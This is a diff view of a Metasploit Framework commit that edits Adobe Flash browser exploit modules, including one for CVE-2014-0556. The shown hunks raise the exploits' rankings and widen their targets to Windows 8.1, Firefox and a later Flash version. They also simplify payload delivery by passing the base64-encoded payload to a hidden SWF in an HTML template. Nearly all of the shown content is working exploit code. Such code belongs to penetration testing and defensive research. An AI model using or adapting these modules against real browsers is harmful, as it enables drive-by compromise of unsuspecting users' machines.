sempervictus
diff --git a/‎data/exploits/CVE-2014-0556/msf.swf
100755100644
2.93 KB b/‎data/exploits/CVE-2014-0556/msf.swf
100755100644
2.93 KB
diff --git a/‎external/source/exploits/CVE-2014-0556/Main.as
Lines changed: 0 additions & 185 deletions b/‎external/source/exploits/CVE-2014-0556/Main.as
Lines changed: 0 additions & 185 deletions
diff --git a/‎modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
Lines changed: 1 addition & 1 deletion b/‎modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb
Lines changed: 1 addition & 1 deletion
diff --git a/‎modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
Lines changed: 1 addition & 1 deletion b/‎modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
Lines changed: 1 addition & 1 deletion
diff --git a/‎modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
Lines changed: 12 additions & 9 deletions b/‎modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
Lines changed: 12 additions & 9 deletions
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GreatRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
 
 
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GreatRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
 
 
@@ -6,9 +6,8 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = GreatRanking
 
-  include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::BrowserExploitServer
 
   def initialize(info={})
@@ -47,9 +46,12 @@ def initialize(info={})
       'BrowserRequirements' =>
         {
           :source  => /script|headers/i,
-          :os_name => OperatingSystems::Match::WINDOWS_7,
-          :ua_name => Msf::HttpClients::IE,
-          :flash   => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <=  Gem::Version.new('14.0.0.176') },
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::WINDOWS_7 ||
+              os =~ OperatingSystems::Match::WINDOWS_81
+          end,
+          :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
+          :flash   => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <=  Gem::Version.new('14.0.0.179') },
           :arch    => ARCH_X86
         },
       'Targets'             =>
@@ -82,17 +84,18 @@ def on_request_exploit(cli, request, target_info)
   def exploit_template(cli, target_info)
     swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
     target_payload = get_payload(cli, target_info)
-    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
-    b64_payload = Rex::Text.encode_base64(psh_payload)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    platform_id = 'win'
+    os_name = target_info[:os_name]
 
     html_template = %Q|<html>
     <body>
     <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
     <param name="movie" value="<%=swf_random%>" />
     <param name="allowScriptAccess" value="always" />
-    <param name="FlashVars" value="sh=<%=b64_payload%>" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
     <param name="Play" value="true" />
-    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
     </object>
     </body>
     </html>